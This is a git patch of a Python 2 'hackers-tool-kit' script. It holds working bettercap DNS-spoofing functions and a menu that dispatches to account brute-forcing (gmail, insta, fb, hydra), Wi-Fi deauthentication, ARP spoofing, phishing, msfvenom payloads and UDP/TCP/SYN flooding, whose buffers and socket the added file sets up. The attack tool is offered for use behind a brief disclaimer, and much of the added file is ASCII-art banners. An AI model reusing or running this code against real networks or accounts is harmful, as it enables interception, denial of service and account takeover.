-#UPDATE HACKERS-TOOL-KIT START# -#-----------------------------# -def update(): - os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") -#---------------------------# -#UPDATE HACKERS-TOOL-KIT END# - -#COMPILE C START# -#---------------# -def compilec(): - print "filename / filepath" - r = raw_input("> ") - print "\nfilename2 / filepath2" - h = raw_input("> ") - - a = 'g++ {0} -o {1}'.format(r,h) - os.system(a) -#COMPILE C END# -#-------------# - -#DNS SPOOF START# -#---------------# -def dnsspoof(): - target = raw_input("\033[1mTarget:\033[0m ") - domain1 = raw_input("\033[1mDomain1:\033[0m ") - domain2 = raw_input("\033[1mDomain2:\033[0m ") - os.system('echo "net.sniff on\n" >> dns.cap') - os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) - os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) - os.system('echo "dns.spoof on\n" >> dns.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet dns.cap") - os.system("rm dns.cap") - -def dnsspoofall(): - domain1 = raw_input("\033[1mDomain1:\033[0m ") - domain2 = raw_input("\033[1mDomain2:\033[0m ") - os.system('echo "net.sniff on\n" >> dnsall.cap') - os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) - os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') - os.system('echo "dns.spoof on\n" >> dnsall.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet dnsall.cap") - os.system("rm dnsall.cap") - - -#-------------# -#DNS SPOOF END# - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - try: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit": - print "\nfollow @tuf_unkn0wn on instagram" - print "\nExiting..." - break - os.system("service tor stop") - os.system("service postgresql stop") - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - if x == "nano": - nano() - if x == "update": - update() - if x == "compilec": - compilec() - if x == "dnsspoof": - dnsspoof() - if x == "dnsspoofall": - dnsspoofall() - except: - print "\nfollow @tuf_unkn0wn on instagram" - print "\nExiting..." - break - os.system("service tor stop") - os.system("service postgresql stop") - found = True - -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 1759bf98eb18a5d9e9b7fc5b7f15f65a86f6848c Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 1 Dec 2019 13:20:07 +0000 Subject: [PATCH 202/214] Add files via upload --- htk.py | 3284 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3284 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..ca9114b --- /dev/null +++ b/htk.py @@ -0,0 +1,3284 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#WARNING START# +#-------------# +from tkinter import * +win = Tk() +warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' +messageVar = Message(win, text = warn) +messageVar.config(bg='red') +messageVar.pack( ) +win.title('HTK: Warning!') +button = Button(win, text='OK', width=25, command=win.destroy) +button.pack() +win.mainloop() +#-----------# +#WARNING END# + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +import readline +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ 